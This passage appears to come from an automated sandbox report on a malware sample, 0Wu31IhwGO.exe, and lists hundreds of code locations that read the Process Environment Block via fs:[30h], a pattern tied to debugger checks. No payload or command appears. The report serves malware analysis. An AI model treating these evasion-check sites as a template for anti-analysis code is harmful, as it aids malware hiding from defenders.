                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]4_2_0134A197
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]4_2_0134A197
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]4_2_0134A197
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014261E5 mov eax, dword ptr fs:[00000030h]4_2_014261E5
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01390185 mov eax, dword ptr fs:[00000030h]4_2_01390185
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F4180 mov eax, dword ptr fs:[00000030h]4_2_013F4180
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F4180 mov eax, dword ptr fs:[00000030h]4_2_013F4180
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013801F8 mov eax, dword ptr fs:[00000030h]4_2_013801F8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]4_2_0140C188
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]4_2_0140C188
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE1D0 mov ecx, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]4_2_013CE1D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6030 mov eax, dword ptr fs:[00000030h]4_2_013E6030
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134A020 mov eax, dword ptr fs:[00000030h]4_2_0134A020
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134C020 mov eax, dword ptr fs:[00000030h]4_2_0134C020
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]4_2_0136E016
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D4000 mov ecx, dword ptr fs:[00000030h]4_2_013D4000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]4_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137C073 mov eax, dword ptr fs:[00000030h]4_2_0137C073
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01352050 mov eax, dword ptr fs:[00000030h]4_2_01352050
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6050 mov eax, dword ptr fs:[00000030h]4_2_013D6050
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E80A8 mov eax, dword ptr fs:[00000030h]4_2_013E80A8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135208A mov eax, dword ptr fs:[00000030h]4_2_0135208A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134C0F0 mov eax, dword ptr fs:[00000030h]4_2_0134C0F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013920F0 mov ecx, dword ptr fs:[00000030h]4_2_013920F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0134A0E3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013580E9 mov eax, dword ptr fs:[00000030h]4_2_013580E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D60E0 mov eax, dword ptr fs:[00000030h]4_2_013D60E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D20DE mov eax, dword ptr fs:[00000030h]4_2_013D20DE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014160B8 mov eax, dword ptr fs:[00000030h]4_2_014160B8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014160B8 mov ecx, dword ptr fs:[00000030h]4_2_014160B8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141A352 mov eax, dword ptr fs:[00000030h]4_2_0141A352
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134C310 mov ecx, dword ptr fs:[00000030h]4_2_0134C310
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01370310 mov ecx, dword ptr fs:[00000030h]4_2_01370310
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]4_2_0138A30B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]4_2_0138A30B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]4_2_0138A30B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F437C mov eax, dword ptr fs:[00000030h]4_2_013F437C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D035C mov ecx, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F8350 mov ecx, dword ptr fs:[00000030h]4_2_013F8350
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140C3CD mov eax, dword ptr fs:[00000030h]4_2_0140C3CD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]4_2_01348397
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]4_2_01348397
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]4_2_01348397
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]4_2_0137438F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]4_2_0137438F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]4_2_0134E388
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]4_2_0134E388
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]4_2_0134E388
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]4_2_0136E3F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]4_2_0136E3F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]4_2_0136E3F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013863FF mov eax, dword ptr fs:[00000030h]4_2_013863FF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE3DB mov eax, dword ptr fs:[00000030h]4_2_013FE3DB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE3DB mov eax, dword ptr fs:[00000030h]4_2_013FE3DB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE3DB mov ecx, dword ptr fs:[00000030h]4_2_013FE3DB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE3DB mov eax, dword ptr fs:[00000030h]4_2_013FE3DB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F43D4 mov eax, dword ptr fs:[00000030h]4_2_013F43D4
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F43D4 mov eax, dword ptr fs:[00000030h]4_2_013F43D4
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D63C0 mov eax, dword ptr fs:[00000030h]4_2_013D63C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134823B mov eax, dword ptr fs:[00000030h]4_2_0134823B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140A250 mov eax, dword ptr fs:[00000030h]4_2_0140A250
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140A250 mov eax, dword ptr fs:[00000030h]4_2_0140A250
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134826B mov eax, dword ptr fs:[00000030h]4_2_0134826B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134A250 mov eax, dword ptr fs:[00000030h]4_2_0134A250
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356259 mov eax, dword ptr fs:[00000030h]4_2_01356259
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D8243 mov eax, dword ptr fs:[00000030h]4_2_013D8243
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D8243 mov ecx, dword ptr fs:[00000030h]4_2_013D8243
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]4_2_013602A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]4_2_013602A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov ecx, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6500 mov eax, dword ptr fs:[00000030h]4_2_013E6500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E59C mov eax, dword ptr fs:[00000030h]4_2_0138E59C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01384588 mov eax, dword ptr fs:[00000030h]4_2_01384588
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01352582 mov eax, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01352582 mov ecx, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013525E0 mov eax, dword ptr fs:[00000030h]4_2_013525E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013565D0 mov eax, dword ptr fs:[00000030h]4_2_013565D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A430 mov eax, dword ptr fs:[00000030h]4_2_0138A430
